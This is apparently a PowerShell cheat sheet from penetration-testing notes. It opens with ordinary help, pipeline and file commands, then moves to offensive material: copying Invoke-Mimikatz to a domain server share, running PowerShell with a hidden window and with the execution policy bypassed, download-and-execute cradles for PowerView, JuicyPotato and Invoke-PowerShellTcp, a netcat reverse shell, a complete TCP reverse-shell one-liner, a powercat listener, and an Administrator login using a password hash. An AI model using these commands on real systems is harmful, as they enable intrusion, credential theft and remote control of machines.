Powershell Fu
-Full : Lists full help about a topic
-Examples: Lists examples of how to run a a cmdlet
#Powershell Help
help *keyword*
powershell /?
powershell -?
powershell -Help
Get-Help *
#List Everything which contains the word process
Get-Help (process_name) -Full -Examples
#List all cmdlets
Get-Command -CommandType cmdlet
#Cmdlets: List full
Get-ChildItem | Format-List *
#Pipelining
Get-Process | Sort-Object -Unique | Select-Object ProcessName
#Default Modules directory
$Env:PSModulePath
#WMI
#List all Wmi classes
Get-CimClass
Get-WmiObject -Class Win32_Volume
#Get Alias
Get-Alias -Definition Get-ChildItem
#Updates the Help System
Update-Help
#Explore Registry
cd HKLM:\
#Scouring for files
Select-String -Path C:\Users\Dan\*.txt -Pattern pass*
Get-ChildItem -Path $searchinfolder -Filter $filename -Recurse | %{$_.FullName}
#Open Files
Get-Content "File name.txt"
#Copy Files
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
#Hides powershell window during execution
powershell.exe -WindowStyle Hidden .\script1.ps1
#Add user to a group
Add-ADGroupMember -Identity <Group> -Members <User>
#Remove User from a Domain Group
Remove-ADGroupMember -Identity <Group> -Members <User>
Remove-LocalGroupMember -Identity <Group> -Members <User>
#Import A Module
Import-Module <modulepath>
#List All Commands In A Module
Get-Command -Module <modulename>
Get-Command -Name Firewall
#View truncated output
$FormatEnumerationLimit=-1
<Command> | out-string -Width 500
#Outputs a single string
-<Command> | Out-string -Stream
#History
Get-History
#Path where all of the history is saved
(Get-PSReadlineOption).HistorySavePath
#Tasks
tasklist
#Services
Get-Services
#Shortcut directory
"%appdata%\Microsoft\Windows\Start Menu\Programs\Windows Powershell"
#Run Powershell
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass
#Check whether powershell is running as 32Bit/64Bit
[Environment]::Is64BitProcess
#Run Powershell as 64Bit Process
c:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass
#On a 64-Bit System, run powershell as 32Bit Process
c:\windows\sysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass
#Base64 encode a file
$EncodedText = Get-Content "File_to_be_encoded"
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
#Execute Base64 encoded scripts
powershell -EncodedCommand $enccommand
#Download Files
Invoke-WebRequest -Uri "http://172.16.10.1/PowerView.ps1" -OutFile "PowerView.ps1"
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.0.172/JuicyPotato.exe','jp.exe')"
#Download & Execute
powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.172/JuicyPotato.exe') Find-AllVulns"
iex (iwr http://<IP>/PowerView.ps1 -UseBasicParsing)
#Execute Commands/Script Block
powershell.exe -Command "& {Get-EventLog -LogName security}"
powershell.exe -Command "& {Import-Module .\Sher.ps1; Find-AllVulns}"
powershell -c "<Command>"
#Unzip files
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip{param([string]$zipfile, [string]$outpath)[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)}
Unzip "C:\a.zip" "C:\a"
#In case of error with System.IO.Compression:
Add-Type -Path "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.5\System.IO.Compression.FileSystem.dll"
Using functions
Login as user using Powershell
Requires: Username:Password Hash
Shell access(eg:nc)
powershell.exe
$username = 'BART\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force '3130438f31186fbaf962f407711faddb'
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Enter-PSSession -ComputerName localhost -Credential $credential
# To get a new shell as Administrator:
cmd.exe /c "C:\inetpub\wwwroot\internal-01\log\nc.exe 10.10.14.143 41337 -e cmd.exe"
Reverse Shells
#Download and execute
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 9001
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.19.99.39/Powerview.ps1'));Find-LocalAdminAccess
powershell.exe iex (iwr http://<IP>/File.ps1 -UseBasicParsing);Invoke-AllChecks
#One-liner Reverse-shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.188.200',45000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Powercat
Reverse shell listener
-t: wait time of 1000 seconds
. .\powercat.ps1
powercat -l -v -p 443 -t 1000
Last updated